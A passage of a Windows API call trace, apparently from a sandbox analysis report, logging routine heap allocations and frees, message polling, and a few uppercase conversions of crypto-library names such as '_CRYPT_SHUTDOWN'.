0x2e54fd8 [0256.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0256.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0256.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0256.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0256.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0256.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0256.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0256.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0256.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0256.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0256.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0256.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0256.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0256.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0256.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0256.025] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0256.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0256.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0256.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0256.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0256.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0256.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0256.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0256.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0256.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0256.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0256.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0256.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0256.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0256.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0256.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0256.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0256.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0256.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0256.026] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0256.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0256.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0256.026] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0256.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0256.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0256.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51388 [0256.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0256.027] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0256.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ff0 [0256.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0256.027] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0256.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ff0 | out: hHeap=0x970000) returned 1 [0256.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0256.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0256.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0256.027] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0256.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0256.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0256.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0256.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0256.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0256.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0256.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0256.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0256.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0256.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0256.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0256.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0256.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0256.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512f8 [0256.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0256.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0256.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514f0 [0256.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513a0 [0256.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0256.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0256.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0256.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0256.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0256.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0256.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0256.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0256.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0256.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0256.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0256.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0256.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0256.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0256.028] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0256.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0256.028] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0256.028] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0256.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0256.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a78 [0256.028] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0256.028] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0256.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a78 | out: hHeap=0x970000) returned 1 [0256.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0256.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0256.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0256.029] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0256.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0256.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0256.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0256.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0256.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0256.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0256.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0256.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0256.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0256.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0256.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0256.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0256.029] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0256.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0256.029] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0256.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0256.029] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0256.029] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0256.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0256.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0256.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0256.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0256.029] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0256.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0256.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0256.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0256.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0256.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0256.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0256.030] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0256.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0256.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0256.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0256.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0256.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0256.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0256.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0256.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0256.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0256.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0256.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0256.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0256.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0256.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0256.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0256.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0256.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0256.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0256.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0256.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0256.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0256.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0256.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0256.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0256.032] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0256.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0256.032] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0256.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0256.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0256.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51400 [0256.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0256.032] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0256.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0256.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0256.032] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0256.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0256.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0256.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51418 [0256.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0256.032] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0256.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0256.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0256.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0256.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0256.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0256.032] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0256.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0256.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0256.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0256.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0256.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0256.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51598 [0256.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51508 [0256.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0256.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0256.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0256.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0256.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51430 [0256.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0256.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0256.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0256.033] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0256.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0256.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0256.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0256.033] HeapFree (in: hHeap=0x970000, 